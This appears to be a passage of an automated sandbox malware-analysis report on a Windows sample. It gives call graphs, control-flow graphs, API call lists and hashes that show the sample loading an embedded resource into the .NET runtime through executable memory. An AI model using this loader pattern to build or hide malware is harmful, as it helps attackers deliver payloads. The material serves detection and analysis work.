13149->13150 13151 402c9b TlsFree 13150->13151 13152 402c8f 13150->13152 13151->13152 13152->13146 13154 40871d 13153->13154 13155 4019b9 13153->13155 13154->13155 13157 407a4c 13154->13157 13155->13049 13155->13093 13158 407a58 __FrameHandler3::FrameUnwindToState 13157->13158 13169 407596 RtlEnterCriticalSection 13158->13169 13160 407a5f 13170 4076f1 13160->13170 13163 407a7d 13194 407aa3 13163->13194 13169->13160 13171 4076fd __FrameHandler3::FrameUnwindToState 13170->13171 13172 407706 13171->13172 13173 407727 13171->13173 13174 40649b ___std_exception_copy 14 API calls 13172->13174 13197 407596 RtlEnterCriticalSection 13173->13197 13176 40770b 13174->13176 13177 4062a0 ___std_exception_copy 41 API calls 13176->13177 13180 407715 13177->13180 13179 407733 13182 40775f 13179->13182 13198 407641 13179->13198 13180->13163 13183 4078e6 GetStartupInfoW 13180->13183 13205 407786 13182->13205 13184 407903 13183->13184 13185 407997 13183->13185 13184->13185 13186 4076f1 42 API calls 13184->13186 13189 40799c 13185->13189 13187 40792b 13186->13187 13187->13185 13188 40795b GetFileType 13187->13188 13188->13187 13191 4079a3 13189->13191 13190 4079e6 GetStdHandle 13190->13191 13191->13190 13192 407a48 13191->13192 13193 4079f9 GetFileType 13191->13193 13192->13163 13193->13191 13214 4075de RtlLeaveCriticalSection 13194->13214 13196 407a8e 13196->13154 13197->13179 13199 4064ae _unexpected 14 API calls 13198->13199 13200 407653 13199->13200 13204 407660 13200->13204 13208 408562 13200->13208 13201 40650b __freea 14 API calls 13202 4076b5 13201->13202 13202->13179 13204->13201 13213 4075de RtlLeaveCriticalSection 13205->13213 13207 40778d 13207->13180 13209 40839e _unexpected 5 API calls 13208->13209 13210 40857e 13209->13210 13211 40859c InitializeCriticalSectionAndSpinCount 13210->13211 13212 408587 13210->13212 13211->13212 13212->13200 13213->13207 13214->13196 13216 402487 13215->13216 13216->13054 13216->13216 13217->13079 13218 a6fbf8 13219 a6fc60 CreateWindowExW 13218->13219 13221 a6fd1c 13219->13221 13222 a66758 13224 a66766 13222->13224 13225 a66344 13222->13225 13226 a6634f 13225->13226 13229 a66394 13226->13229 13228 a6688d 13228->13224 13230 a6639f 13229->13230 13233 a663c4 13230->13233 13232 a66962 13232->13228 13234 a663cf 13233->13234 13237 a663f4 13234->13237 13236 a66a62 13236->13232 13238 a663ff 13237->13238 13243 a66c10 13238->13243 13240 a66f93 13241 a671bc 13240->13241 13247 a6b3f8 13240->13247 13241->13236 13244 a66c1b 13243->13244 13245 a67e9a 13244->13245 13251 a67eea 13244->13251 13245->13240 13248 a6b429 13247->13248 13249 a6b44d 13248->13249 13255 a6b5b8 13248->13255 13249->13241 13252 a67f3b 13251->13252 13253 a67f46 KiUserCallbackDispatcher 13252->13253 13254 a67f70 13252->13254 13253->13254 13254->13245 13257 a6b5c5 13255->13257 13256 a6b5ff 13256->13249 13257->13256 13259 a6a0ec 13257->13259 13260 a6a0f7 13259->13260 13262 a6c2f8 13260->13262 13263 a6b904 13260->13263 13262->13262 13264 a6b90f 13263->13264 13265 a6c367 13264->13265 13266 a663f4 5 API calls 13264->13266 13267 a6c375 13265->13267 13273 a6c3e0 13265->13273 13277 a6c3d0 13265->13277 13266->13265 13281 a6e0f0 13267->13281 13286 a6e0d8 13267->13286 13268 a6c3a0 13268->13262 13274 a6c40e 13273->13274 13275 a6c4da KiUserCallbackDispatcher 13274->13275 13276 a6c4df 13274->13276 13275->13276 13278 a6c40e 13277->13278 13279 a6c4da KiUserCallbackDispatcher 13278->13279 13280 a6c4df 13278->13280 13279->13280 13282 a6e121 13281->13282 13283 a6e12d 13281->13283 13282->13283 13291 a6e428 13282->13291 13294 a6e438 13282->13294 13283->13268 13287 a6e0f0 13286->13287 13288 a6e12d 13287->13288 13289 a6e428 2 API calls 13287->13289 13290 a6e438 2 API calls 13287->13290 13288->13268 13289->13288 13290->13288 13292 a693e8 LoadLibraryExW GetModuleHandleW 13291->13292 13293 a6e441 13292->13293 13293->13283 13295 a693e8 LoadLibraryExW GetModuleHandleW 13294->13295 13296 a6e441 13294->13296 13295->13296 13296->13283

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
                                                                                    • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 00401491
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
                                                                                    • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
                                                                                    • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
                                                                                    • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
                                                                                      • Part of subcall function 0040147B: CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                                                    • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
                                                                                    • ExitProcess.KERNEL32 ref: 004014E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                                    • String ID: v4.0.30319
                                                                                    • API String ID: 2372384083-3152434051
                                                                                    • Opcode ID: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                                                                                    • Instruction ID: 1025187115c16df301aa5e6fb14f5cc9936e15f8599d421e9e42fb84dc5f9529
                                                                                    • Opcode Fuzzy Hash: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                                                                                    • Instruction Fuzzy Hash: D4F04470A0131477EB202BF34D4DF2B755C9F85746F040874F601BA2A0CAB4DC008679
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E22,0040170D), ref: 00401E1B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                                                                                    • Instruction ID: 1700cd800284021a96fa1165edcf07aa52b884b6f150888f85792e917e9d8571
                                                                                    • Opcode Fuzzy Hash: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 400f61-400f84 1 400ff6-401003 0->1 2 400f86-400f94 0->2 3 401009-40105a CLRCreateInstance 1->3 2->1 5 40105e-401082 3->5 9 401088-40109b 5->9 10 40109f-4010a3 9->10 11 4010a9-4010ad 10->11 12 4010b2-4010c1 11->12 14 4010c3-4010c5 12->14 15 4010c9-4010d1 12->15 14->15 16 4010d6-4010f0 15->16 19 4010f2-4010f4 16->19 20 4010f8-40110a 16->20 19->20 22 401110-40112e SafeArrayCreate 20->22 23 401134-401171 SafeArrayAccessData call 403120 SafeArrayUnaccessData 22->23 28 401173-401175 23->28 29 401179-401182 23->29 28->29 65 401183 call 5ed01d 29->65 66 401183 call 5ed006 29->66 30 401189-4011a3 33 4011a5-4011a7 30->33 34 4011ab-4011b1 30->34 33->34 67 4011b2 call 5ed01d 34->67 68 4011b2 call 5ed006 34->68 35 4011b5-4011c4 37 4011ca-4011d0 35->37 69 4011d1 call 5ed01d 37->69 70 4011d1 call 5ed006 37->70 38 4011d4-401211 GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 41 401280-401288 38->41 42 401213-40121b 38->42 45 401290-401295 41->45 46 40128a-40128c 41->46 43 40124a-40127a SafeArrayCreateVector SafeArrayPutElement 42->43 44 40121d-40123c SysAllocString SafeArrayPutElement 42->44 43->41 44->41 47 40123e-401248 44->47 48 401297-401299 45->48 49 40129d-4012a2 45->49 46->45 47->43 47->44 48->49 50 4012b3-4012b5 49->50 51 4012a4-4012ae 49->51 52 4012b7-4012b8 SafeArrayDestroy 50->52 53 4012be-4012c0 50->53 51->50 52->53 54 4012c2-4012c3 SafeArrayDestroy 53->54 55 4012c9-4012ce 53->55 54->55 57 4012d0-4012d2 55->57 58 4012d6-4012db 55->58 57->58 59 4012e3-4012e8 58->59 60 4012dd-4012df 58->60 61 4012f0-4012f5 59->61 62 4012ea-4012ec 59->62 60->59 63 4012f7-4012f9 61->63 64 4012fd-401303 61->64 62->61 63->64 65->30 66->30 67->35 68->35 69->38 70->38
                                                                                    APIs
                                                                                    • CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID: v4.0.30319
                                                                                    • API String ID: 542301482-3152434051
                                                                                    • Opcode ID: 77243af43771274cdb188aef89358dc4b6a46996269f3f5b9eca3cf8be097b49
                                                                                    • Instruction ID: e5bbcf8570dedd721561150fbe93f273e631184976035fe4b26c3be348694e41
                                                                                    • Opcode Fuzzy Hash: 77243af43771274cdb188aef89358dc4b6a46996269f3f5b9eca3cf8be097b49
                                                                                    • Instruction Fuzzy Hash: A3B14A75A012199FCB01CFA4C988EAEBBB9BF48754B14446EE905FB360DB35DD01CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 71 400fca-400fcc 72 400fec-401003 71->72 73 400fce 71->73 75 401009-40105a CLRCreateInstance 72->75 73->72 77 40105e-401082 75->77 81 401088-40109b 77->81 82 40109f-4010a3 81->82 83 4010a9-4010ad 82->83 84 4010b2-4010c1 83->84 86 4010c3-4010c5 84->86 87 4010c9-4010d1 84->87 86->87 88 4010d6-4010f0 87->88 91 4010f2-4010f4 88->91 92 4010f8-40110a 88->92 91->92 94 401110-40112e SafeArrayCreate 92->94 95 401134-401171 SafeArrayAccessData call 403120 SafeArrayUnaccessData 94->95 100 401173-401175 95->100 101 401179-401182 95->101 100->101 139 401183 call 5ed01d 101->139 140 401183 call 5ed006 101->140 102 401189-4011a3 105 4011a5-4011a7 102->105 106 4011ab-4011b1 102->106 105->106 141 4011b2 call 5ed01d 106->141 142 4011b2 call 5ed006 106->142 107 4011b5-4011c4 109 4011ca-4011d0 107->109 137 4011d1 call 5ed01d 109->137 138 4011d1 call 5ed006 109->138 110 4011d4-401211 GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 113 401280-401288 110->113 114 401213-40121b 110->114 117 401290-401295 113->117 118 40128a-40128c 113->118 115 40124a-40127a SafeArrayCreateVector SafeArrayPutElement 114->115 116 40121d-40123c SysAllocString SafeArrayPutElement 114->116 115->113 116->113 119 40123e-401248 116->119 120 401297-401299 117->120 121 40129d-4012a2 117->121 118->117 119->115 119->116 120->121 122 4012b3-4012b5 121->122 123 4012a4-4012ae 121->123 124 4012b7-4012b8 SafeArrayDestroy 122->124 125 4012be-4012c0 122->125 123->122 124->125 126 4012c2-4012c3 SafeArrayDestroy 125->126 127 4012c9-4012ce 125->127 126->127 129 4012d0-4012d2 127->129 130 4012d6-4012db 127->130 129->130 131 4012e3-4012e8 130->131 132 4012dd-4012df 130->132 133 4012f0-4012f5 131->133 134 4012ea-4012ec 131->134 132->131 135 4012f7-4012f9 133->135 136 4012fd-401303 133->136 134->133 135->136 137->110 138->110 139->102 140->102 141->107 142->107
                                                                                    APIs
                                                                                    • CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID: v4.0.30319
                                                                                    • API String ID: 542301482-3152434051
                                                                                    • Opcode ID: d5844462e1a5dd029352ded2376a126f08e6edf1cdd364a8f2b9e562c4d8b20e
                                                                                    • Instruction ID: f08f0f033d3d63231fbdb02c94349a7a69f50f577d8668260f178b61efdc381d
                                                                                    • Opcode Fuzzy Hash: d5844462e1a5dd029352ded2376a126f08e6edf1cdd364a8f2b9e562c4d8b20e
                                                                                    • Instruction Fuzzy Hash: E2B12B75A012199FDB01CFA4C988EAEBBB9BF88750B14446EE905FB3A0DB35DD01CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 143 400fe9-4010c1 CLRCreateInstance 157 4010c3-4010c5 143->157 158 4010c9-4010f0 143->158 157->158 162 4010f2-4010f4 158->162 163 4010f8-401171 SafeArrayCreate SafeArrayAccessData call 403120 SafeArrayUnaccessData 158->163 162->163 171 401173-401175 163->171 172 401179-401182 163->172 171->172 212 401183 call 5ed01d 172->212 213 401183 call 5ed006 172->213 173 401189-4011a3 176 4011a5-4011a7 173->176 177 4011ab-4011b1 173->177 176->177 208 4011b2 call 5ed01d 177->208 209 4011b2 call 5ed006 177->209 178 4011b5-4011d0 210 4011d1 call 5ed01d 178->210 211 4011d1 call 5ed006 178->211 181 4011d4-401211 GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 184 401280-401288 181->184 185 401213-40121b 181->185 188 401290-401295 184->188 189 40128a-40128c 184->189 186 40124a-40127a SafeArrayCreateVector SafeArrayPutElement 185->186 187 40121d-40123c SysAllocString SafeArrayPutElement 185->187 186->184 187->184 190 40123e-401248 187->190 191 401297-401299 188->191 192 40129d-4012a2 188->192 189->188 190->186 190->187 191->192 193 4012b3-4012b5 192->193 194 4012a4-4012ae 192->194 195 4012b7-4012b8 SafeArrayDestroy 193->195 196 4012be-4012c0 193->196 194->193 195->196 197 4012c2-4012c3 SafeArrayDestroy 196->197 198 4012c9-4012ce 196->198 197->198 200 4012d0-4012d2 198->200 201 4012d6-4012db 198->201 200->201 202 4012e3-4012e8 201->202 203 4012dd-4012df 201->203 204 4012f0-4012f5 202->204 205 4012ea-4012ec 202->205 203->202 206 4012f7-4012f9 204->206 207 4012fd-401303 204->207 205->204 206->207 208->178 209->178 210->181 211->181 212->173 213->173
                                                                                    APIs
                                                                                    • CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                                                    • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00401121
                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00401139
                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0040115B
                                                                                    • GetCommandLineW.KERNEL32(?), ref: 004011EE
                                                                                    • CommandLineToArgvW.SHELL32(00000000), ref: 004011F5
                                                                                    • SafeArrayCreateVector.OLEAUT32(00000008,00000000,?), ref: 00401204
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00401226
                                                                                    • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 00401232
                                                                                    • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 0040124F
                                                                                    • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 00401270
                                                                                    • SafeArrayDestroy.OLEAUT32(?), ref: 004012B8
                                                                                    • SafeArrayDestroy.OLEAUT32(00000000), ref: 004012C3
                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00401312
                                                                                    • CoInitialize.OLE32(00000000), ref: 00401322
                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00401344
                                                                                    • VariantInit.OLEAUT32(?), ref: 0040140D
                                                                                    • VariantInit.OLEAUT32(?), ref: 00401416
                                                                                    • VariantClear.OLEAUT32(?), ref: 00401438
                                                                                    • VariantClear.OLEAUT32(?), ref: 0040144A
                                                                                    • VariantClear.OLEAUT32(?), ref: 00401453
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
                                                                                    • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 00401491
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
                                                                                    • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
                                                                                    • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
                                                                                    • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
                                                                                    • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
                                                                                    • ExitProcess.KERNEL32 ref: 004014E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$CreateResourceVariant$ClearHandleModule$AllocCommandDataDestroyElementInitLineVector$AccessArgvExitFindFreeInitializeInstanceLoadLockProcessSizeofStringUnaccessVirtual
                                                                                    • String ID: v4.0.30319
                                                                                    • API String ID: 3516860096-3152434051
                                                                                    • Opcode ID: 873238705ce47a69c6e2e929523a932b8a4326f398e40a407d6947fa5b2cd078
                                                                                    • Instruction ID: 0c2c29d2e87145e6a018a0f42715e838ea3eb340154ddaa220d5c303f6f6ea5b
                                                                                    • Opcode Fuzzy Hash: 873238705ce47a69c6e2e929523a932b8a4326f398e40a407d6947fa5b2cd078
                                                                                    • Instruction Fuzzy Hash: B2B12975A012199FCB01CFA4C988EAEBBB9BF88750B14446EE905FB360DB35DD01CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 214 400fae-400fb0 215 400fb2-400fb7 214->215 216 401009-40105a CLRCreateInstance 214->216 215->216 218 40105e-401082 216->218 222 401088-40109b 218->222 223 40109f-4010a3 222->223 224 4010a9-4010ad 223->224 225 4010b2-4010c1 224->225 227 4010c3-4010c5 225->227 228 4010c9-4010d1 225->228 227->228 229 4010d6-4010f0 228->229 232 4010f2-4010f4 229->232 233 4010f8-40110a 229->233 232->233 235 401110-40112e SafeArrayCreate 233->235 236 401134-401171 SafeArrayAccessData call 403120 SafeArrayUnaccessData 235->236 241 401173-401175 236->241 242 401179-401182 236->242 241->242 282 401183 call 5ed01d 242->282 283 401183 call 5ed006 242->283 243 401189-4011a3 246 4011a5-4011a7 243->246 247 4011ab-4011b1 243->247 246->247 278 4011b2 call 5ed01d 247->278 279 4011b2 call 5ed006 247->279 248 4011b5-4011c4 250 4011ca-4011d0 248->250 280 4011d1 call 5ed01d 250->280 281 4011d1 call 5ed006 250->281 251 4011d4-401211 GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 254 401280-401288 251->254 255 401213-40121b 251->255 258 401290-401295 254->258 259 40128a-40128c 254->259 256 40124a-40127a SafeArrayCreateVector SafeArrayPutElement 255->256 257 40121d-40123c SysAllocString SafeArrayPutElement 255->257 256->254 257->254 260 40123e-401248 257->260 261 401297-401299 258->261 262 40129d-4012a2 258->262 259->258 260->256 260->257 261->262 263 4012b3-4012b5 262->263 264 4012a4-4012ae 262->264 265 4012b7-4012b8 SafeArrayDestroy 263->265 266 4012be-4012c0 263->266 264->263 265->266 267 4012c2-4012c3 SafeArrayDestroy 266->267 268 4012c9-4012ce 266->268 267->268 270 4012d0-4012d2 268->270 271 4012d6-4012db 268->271 270->271 272 4012e3-4012e8 271->272 273 4012dd-4012df 271->273 274 4012f0-4012f5 272->274 275 4012ea-4012ec 272->275 273->272 276 4012f7-4012f9 274->276 277 4012fd-401303 274->277 275->274 276->277 278->248 279->248 280->251 281->251 282->243 283->243
                                                                                    APIs
                                                                                    • CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID: v4.0.30319
                                                                                    • API String ID: 542301482-3152434051
                                                                                    • Opcode ID: 85fe1cc5f0066b84895c07e484125a00651d0d94523f1ac9f254cc520d16adbb
                                                                                    • Instruction ID: c628a7e1a31fe17d332532bab36448b76cf9220d3634fe75d1a8a10d87e09ff7
                                                                                    • Opcode Fuzzy Hash: 85fe1cc5f0066b84895c07e484125a00651d0d94523f1ac9f254cc520d16adbb
                                                                                    • Instruction Fuzzy Hash: 9BB13B75A012199FCB01CFA4C988DAEBBB9BF88750B14446EE905FB360DB35DD41CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 284 400fd8-400fdf 285 400fe1-400fe7 284->285 286 401044-40104c 284->286 285->286 287 40104e-40105a 286->287 288 40105e-401082 287->288 292 401088-40109b 288->292 293 40109f-4010a3 292->293 294 4010a9-4010ad 293->294 295 4010b2-4010c1 294->295 297 4010c3-4010c5 295->297 298 4010c9-4010d1 295->298 297->298 299 4010d6-4010f0 298->299 302 4010f2-4010f4 299->302 303 4010f8-40110a 299->303 302->303 305 401110-40112e SafeArrayCreate 303->305 306 401134-401171 SafeArrayAccessData call 403120 SafeArrayUnaccessData 305->306 311 401173-401175 306->311 312 401179-401182 306->312 311->312 352 401183 call 5ed01d 312->352 353 401183 call 5ed006 312->353 313 401189-4011a3 316 4011a5-4011a7 313->316 317 4011ab-4011b1 313->317 316->317 348 4011b2 call 5ed01d 317->348 349 4011b2 call 5ed006 317->349 318 4011b5-4011c4 320 4011ca-4011d0 318->320 350 4011d1 call 5ed01d 320->350 351 4011d1 call 5ed006 320->351 321 4011d4-401211 GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 324 401280-401288 321->324 325 401213-40121b 321->325 328 401290-401295 324->328 329 40128a-40128c 324->329 326 40124a-40127a SafeArrayCreateVector SafeArrayPutElement 325->326 327 40121d-40123c SysAllocString SafeArrayPutElement 325->327 326->324 327->324 330 40123e-401248 327->330 331 401297-401299 328->331 332 40129d-4012a2 328->332 329->328 330->326 330->327 331->332 333 4012b3-4012b5 332->333 334 4012a4-4012ae 332->334 335 4012b7-4012b8 SafeArrayDestroy 333->335 336 4012be-4012c0 333->336 334->333 335->336 337 4012c2-4012c3 SafeArrayDestroy 336->337 338 4012c9-4012ce 336->338 337->338 340 4012d0-4012d2 338->340 341 4012d6-4012db 338->341 340->341 342 4012e3-4012e8 341->342 343 4012dd-4012df 341->343 344 4012f0-4012f5 342->344 345 4012ea-4012ec 342->345 343->342 346 4012f7-4012f9 344->346 347 4012fd-401303 344->347 345->344 346->347 348->318 349->318 350->321 351->321 352->313 353->313
                                                                                    APIs
                                                                                    • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00401121
                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00401139
                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0040115B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341180010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_czkdqe.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$Data$AccessCreateUnaccess
                                                                                    • String ID: v4.0.30319
                                                                                    • API String ID: 3631458715-3152434051
                                                                                    • Opcode ID: 02245fa6a25c8a7a88b4d047e5ae443a1f903a675161b50fceca8856171a95dd
                                                                                    • Instruction ID: 2316b79ef1876d233a0ca10ce79880e8c0426e1a516b816bc189b1ee0b53c2a9
                                                                                    • Opcode Fuzzy Hash: 02245fa6a25c8a7a88b4d047e5ae443a1f903a675161b50fceca8856171a95dd
                                                                                    • Instruction Fuzzy Hash: E6A14B75A002199FCB11CFA4C888EAEBBB9AF48750B14046DE905FB3A1DB35ED01CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 362 a6b6d0-a6b741 GetCurrentProcess 363 a6b743-a6b749 362->363 364 a6b74a-a6b77e GetCurrentThread 362->364 363->364 365 a6b787-a6b7bb GetCurrentProcess 364->365 366 a6b780-a6b786 364->366 367 a6b7c4-a6b7df call a6bc89 365->367 368 a6b7bd-a6b7c3 365->368 366->365 372 a6b7e5-a6b814 GetCurrentThreadId 367->372 368->367 373 a6b816-a6b81c 372->373 374 a6b81d-a6b87f 372->374 373->374
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 00A6B730
                                                                                    • GetCurrentThread.KERNEL32 ref: 00A6B76D
                                                                                    • GetCurrentProcess.KERNEL32 ref: 00A6B7AA
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A6B803
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.341741981.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_a60000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID: Hz
                                                                                    • API String ID: 2063062207-1816250803
                                                                                    • Opcode ID: 19c68b7eed81ad48d8647866529614fca8c7b0a956702aaf94e2f54720fe40b0
                                                                                    • Instruction ID: cecac8152f7f4c1702522999a24313abdda37c444e43d3341dce3ae4d7318f49
                                                                                    • Opcode Fuzzy Hash: 19c68b7eed81ad48d8647866529614fca8c7b0a956702aaf94e2f54720fe40b0
                                                                                    • Instruction Fuzzy Hash: C95157B4901648CFDB10CFAAC548BDEBBF5BF88304F20855AE019A7360D7745884CF65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
